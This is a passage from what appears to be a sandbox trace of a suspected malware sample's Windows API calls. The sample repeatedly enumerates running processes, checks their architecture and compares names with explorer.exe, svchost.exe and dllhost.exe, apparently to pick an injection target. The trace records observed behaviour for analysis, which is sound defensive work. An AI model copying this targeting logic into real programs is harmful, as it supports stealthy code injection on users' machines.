lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0237.783] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0237.783] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0237.783] CloseHandle (hObject=0xd8) returned 1 [0237.783] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0237.784] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0237.784] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0237.784] CloseHandle (hObject=0xd8) returned 1 [0237.784] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0237.785] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0237.785] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0237.785] CloseHandle (hObject=0xd8) returned 1 [0237.785] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0237.785] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0237.785] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0237.785] CloseHandle (hObject=0xd8) returned 1 [0237.785] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0237.786] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0237.786] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0237.786] CloseHandle (hObject=0xd8) returned 1 [0237.786] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0237.786] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0237.786] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0237.786] CloseHandle (hObject=0xd8) returned 1 [0237.786] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0237.787] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0237.787] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0237.787] CloseHandle (hObject=0xd8) returned 1 [0237.787] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0237.787] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0237.787] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.788] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0237.788] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0237.788] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0237.789] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.789] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0237.789] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0237.789] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0237.790] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0237.790] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0237.790] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0237.790] CloseHandle (hObject=0xd8) returned 1 [0237.790] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0237.790] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0237.791] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0237.791] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0237.791] CloseHandle (hObject=0xd8) returned 1 [0237.791] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0237.791] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0237.791] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0237.791] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0237.791] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0237.791] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0237.792] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0237.792] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0237.792] CloseHandle (hObject=0xd8) returned 1 [0237.792] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0237.792] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0237.792] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0237.792] CloseHandle (hObject=0xd8) returned 1 [0237.792] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0237.793] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0237.793] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0237.793] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0237.793] CloseHandle (hObject=0xd8) returned 1 [0237.793] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0237.794] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0237.794] CloseHandle (hObject=0xd4) returned 1 [0237.794] Sleep (dwMilliseconds=0x3e8) [0238.798] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0238.800] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0238.800] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0238.800] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0238.801] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0238.801] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0238.801] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0238.801] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0238.802] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0238.802] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0238.802] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0238.802] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0238.803] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0238.803] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0238.803] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0238.803] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0238.803] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0238.804] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0238.804] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0238.804] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0238.804] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0238.805] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.805] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0238.805] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.805] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0238.805] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.806] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0238.806] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.806] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0238.806] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.807] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0238.807] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0238.807] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0238.808] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.808] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0238.808] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.808] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0238.809] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0238.809] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0238.809] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0238.809] CloseHandle (hObject=0xd8) returned 1 [0238.809] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0238.809] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0238.809] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0238.809] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0238.810] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0238.810] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0238.810] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0238.810] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0238.810] CloseHandle (hObject=0xd8) returned 1 [0238.810] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0238.810] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0238.810] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0238.810] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.811] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0238.811] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0238.811] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0238.811] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0238.812] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0238.812] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0238.812] CloseHandle (hObject=0xd8) returned 1 [0238.812] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0238.812] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0238.812] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0238.812] CloseHandle (hObject=0xd8) returned 1 [0238.812] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0238.813] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0238.813] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0238.813] CloseHandle (hObject=0xd8) returned 1 [0238.813] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0238.814] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0238.814] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0238.814] CloseHandle (hObject=0xd8) returned 1 [0238.814] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0238.814] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0238.814] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0238.814] CloseHandle (hObject=0xd8) returned 1 [0238.814] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0238.815] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0238.815] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0238.815] CloseHandle (hObject=0xd8) returned 1 [0238.815] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0238.815] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0238.815] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0238.815] CloseHandle (hObject=0xd8) returned 1 [0238.815] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0238.816] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0238.816] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0238.816] CloseHandle (hObject=0xd8) returned 1 [0238.816] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0238.816] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0238.817] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0238.817] CloseHandle (hObject=0xd8) returned 1 [0238.817] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0238.817] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0238.817] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0238.817] CloseHandle (hObject=0xd8) returned 1 [0238.817] Process32Next (in: 